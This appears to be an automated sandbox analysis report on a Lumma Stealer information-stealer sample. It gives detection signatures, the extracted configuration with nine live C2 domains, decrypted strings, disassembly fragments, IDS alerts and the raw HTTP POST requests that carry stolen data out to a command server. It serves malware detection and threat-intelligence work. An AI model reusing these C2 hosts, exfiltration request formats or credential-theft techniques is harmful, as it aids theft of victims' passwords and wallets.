
Windows Analysis Report
X2hna87N3Y.exe

Overview

General Information

Sample name: X2hna87N3Y.exe
renamed because original name is a hash value
Original sample name: 443f4cf9f362a96bbd0845ba6d2859f0.exe
Analysis ID: 1576576
MD5: 443f4cf9f362a96bbd0845ba6d2859f0
SHA1: 1bf75dea31eaf0c26da3428ae2b8518771989522
SHA256: e11c9223741b2d1291f1031539da3dd183ce2ac4b2de705d92366c6f61d94aa5
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • X2hna87N3Y.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\X2hna87N3Y.exe" MD5: 443F4CF9F362A96BBD0845BA6D2859F0)
    • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • X2hna87N3Y.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\X2hna87N3Y.exe" MD5: 443F4CF9F362A96BBD0845BA6D2859F0)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["debonairnukk.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "yau6Na--7911731954"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: X2hna87N3Y.exe PID: 7536 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: X2hna87N3Y.exe PID: 7536 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: X2hna87N3Y.exe PID: 7536 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T09:44:46.252787+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:48.513726+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:51.088601+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:53.644621+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:55.870029+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:58.597611+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:03.023443+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:06.714844+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:47.246583+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:49.565445+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:07.452999+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:47.246583+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:49.565445+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:46.252787+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:48.513726+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:51.088601+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:53.644621+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:55.870029+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:58.597611+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:03.023443+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49740 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:06.714844+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:44.702846+0100 | 2058230 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54326 | 1.1.1.1 | 53 | UDP
2024-12-17T09:44:52.295457+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP

AV Detection

Source: https://tacitglibbr.biz/api5pnX | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/$ | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/apiGy | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "yau6Na--7911731954"}
Source: X2hna87N3Y.exe | Virustotal: Detection: 52%
Source: X2hna87N3Y.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.8% probability
Source: X2hna87N3Y.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: tacitglibbr.biz
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: yau6Na--7911731954
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00418A48 CryptUnprotectData | 2_2_00418A48
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00DB52D0 CryptContextAddRef,GetLastError | 2_2_00DB52D0
Source: X2hna87N3Y.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: X2hna87N3Y.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D9D358 FindFirstFileExW,FindNextFileW,FindClose,FindClose | 0_2_00D9D358
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h | 2_2_0043C070
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edi, byte ptr [esp+esi] | 2_2_00435880
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000E0h] | 2_2_0040C97B
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [eax], bl | 2_2_0040C97B
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [eax], dl | 2_2_0040C97B
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebp-6DCE19CBh] | 2_2_0040C593
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebp-6DCE19CBh] | 2_2_0040C593
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 2_2_004256E0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043B800
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then inc edi | 2_2_0042C024
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_004330F0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov ebx, eax | 2_2_00405930
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov ebp, eax | 2_2_00405930
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+30h] | 2_2_0041A9F0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042C189
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+3FE92E27h] | 2_2_004091B0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-030ABCF4h] | 2_2_00425A42
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+45DEA01Ch] | 2_2_00423249
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [esi], cx | 2_2_00423249
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 2_2_00423249
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov esi, dword ptr [esp+38h] | 2_2_00423249
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_00427250
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_0042B258
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov edi, edx | 2_2_0042B258
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx] | 2_2_00438A00
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov ecx, ebx | 2_2_00438A00
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 2_2_00419210
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3Ch] | 2_2_0040C22A
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+45DEA01Ch] | 2_2_004232C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [esi], cx | 2_2_004232C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 2_2_004232C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00426288
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043BA90
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov ecx, eax | 2_2_00421AAD
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h | 2_2_00421AAD
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0040BAB0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_004262B1
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx eax, byte ptr [ebx] | 2_2_00436B74
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ecx, word ptr [esi+eax+02h] | 2_2_00436B74
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_0042B3C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov edi, edx | 2_2_0042B3C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ecx | 2_2_00439B80
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+14h] | 2_2_00421390
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx-000000B6h] | 2_2_00421390
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then test eax, eax | 2_2_004363A0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov dword ptr [esi+08h], edx | 2_2_0042C3A4
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_0041B3B2
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0040BC3E
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043B4D0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 2_2_00428480
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+10h] | 2_2_0041AC8E
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [edi] | 2_2_00416C91
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00407490
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h] | 2_2_00407490
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_00416494
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_004294A0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h | 2_2_00428D60
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+57C69F03h] | 2_2_0041D520
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 2_2_0041D520
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042AD2D
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 2_2_004275C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_004275C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043B5C0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov edi, eax | 2_2_004095B0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-06C6522Eh] | 2_2_00418E01
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov word ptr [edi], cx | 2_2_0041BE3C
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043B6E0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00428EF0
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp dword ptr [00442888h] | 2_2_0041C6A4
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax-31h] | 2_2_0040A740
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov edx, ecx | 2_2_00427F40
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then jmp ebp | 2_2_0043B770
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edi] | 2_2_00408F00
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 2_2_00427726
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-06C6522Eh] | 2_2_00418F36
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_0041A7EF
Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 2_2_00424F90

Networking

              Source: Network trafficSuricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.4:54326 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49734 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49735 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49740 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: tacitglibbr.biz
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Joe Sandbox ViewIP Address: 104.21.50.161 104.21.50.161
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.50.161:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=47HA2BJC5LRQZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WKKY9HQD72NIN8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8765Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7XS29QDJ54QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6R60VIOJM9OLEPQJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z58EJ5HRPTGP3ZMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551867Host: tacitglibbr.biz
